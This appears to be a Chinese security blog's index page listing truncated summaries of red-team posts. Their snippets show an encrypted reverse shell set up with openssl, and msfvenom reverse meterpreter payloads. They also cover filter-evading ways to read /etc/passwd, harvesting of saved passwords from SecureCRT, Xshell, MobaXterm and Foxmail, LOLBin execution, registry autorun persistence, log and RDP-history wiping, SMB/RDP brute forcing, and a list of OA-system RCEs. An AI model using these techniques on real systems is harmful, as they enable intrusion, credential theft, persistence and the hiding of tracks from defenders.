摘要：加密Tcp反向 攻击机： openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -po 阅读全文

摘要：域外windows 一句话域内搜集 PingCastle.exe --server 192.168.3.142 --user 0day.org\jack --password admin!@#45 --protocol ADWSThenLDAP --healthcheck --explore-tru 阅读全文

摘要：简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite 中包含的工具。最初，它旨在作为系统管理员的便利工具，以便他们可以通过在远程主机上运行命令来执行维护任务。PsExec 可以算是一个轻量级的 telnet 替代工具，它使您无需手动安装客户端软件即 阅读全文

摘要：cat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pass'wd' cat /etc/pa??wd cat /etc/p*wd cat /et''c/pass''wd cat /et${test}c/pa${hah}sswd IFS=,;`cat<<<ca 阅读全文

摘要：远程连接服务时出现如下报错，主要因为交换ssh密钥时候算法不匹配，这里需要自行解决ssh相关问题，此处不再深入赘述 实际使用 找到目标securecrt保存在本地的所有连接会话文件，默认都存放在当前用户数据目录下的Config目录下的Sessions目录中,以.ini命名 %APPDATA%\Van 阅读全文

摘要：加密方式： https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md 账户密码保存位置： XShell5 %userpro 阅读全文

摘要：工具链接 https://github.com/HyperSine/how-does-MobaXterm-encrypt-password 不带管理密码 无管理密码的解密，直接读注册表，从注册表读连接信息和账户hash reg query HKEY_CURRENT_USER\Software\Mob 阅读全文

摘要：第一种 https://github.com/StarZHF/Foxmail-Password-Recovery/tree/master/foxDecode 自行编译后直接丢工具解密即可 第二种 找到foxmail的安装目录： E:\Program Files\Foxmail 7.2\Storage 阅读全文

摘要：windows命令绕过 forfies 使用方式如下： 实际使用： forfiles /c c:\windows\system32\calc.exe 确认任务的父进程为forfiles.exe pcalua 实际使用： pcalua.exe -a c:\windows\system32\calc.e 阅读全文

摘要：适用于dll或者自启动 reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v bug /t REG_SZ /d "C:\bug\bug.exe" reg add "HKEY_L 阅读全文

摘要：rem clear all reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft 阅读全文

摘要：MSF服务爆破 此处自行解决如何进入内网，可vpn可socks代理 SMB爆破 msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > set rhosts file:/home/yang/ 阅读全文

摘要：常用攻击手段 确认端口开启 常用爆破 hydra -v -f -l administrator -P /home/yang/Desktop/pass.txt rdp://192.168.3.142 DOS攻击 检测ms12-020漏洞存在 msf5 > use auxiliary/scanner/r 阅读全文

摘要：windows痕迹清理 日志路径： 系统日志：%SystemRoot%\System32\Winevt\Logs\System.evtx 安全日志：%SystemRoot%\System32\Winevt\Logs\Security.evtx 应用程序日志：%SystemRoot%\System32 阅读全文

摘要：关注日志路径 C:/Windows/System32/winevt/Logs/ C:/WINDOWS/system32/config Dumpel 本地或远程导出日志 dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] 阅读全文

摘要：格式未整理，不过都是搞技术的，自行忽略格式，看看相关理论才是最重要吧 术语 工作组:工作组是局域网中的一个概念，他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理，将不同的computer按照不同的要求分类到不同的组 域:用来描述一种架构，和“工作组”相对应，由工作组升级而来的高级架构，域 阅读全文

摘要： 阅读全文

摘要：##反向 Windows meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > test.exe shell msfvenom -p windows/shell/reverse_tcp LHOST 阅读全文

摘要：##137、138、139 NetBios端口，137、138主要用于内网传输文件，139主要用于NetBios服务 ##135 该端口主要使用DCOM和RPC（Remote Procedure Call）服务，也可用于WMI（Windows Management Instrumentation）进 阅读全文

摘要：##转载分享存档，仅供学习代码使用，用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul ##一、OA系统 ####泛微(Weaver-Ecology-OA) 🔸 泛微OA E-cology RCE(CNVD-2019-3220 阅读全文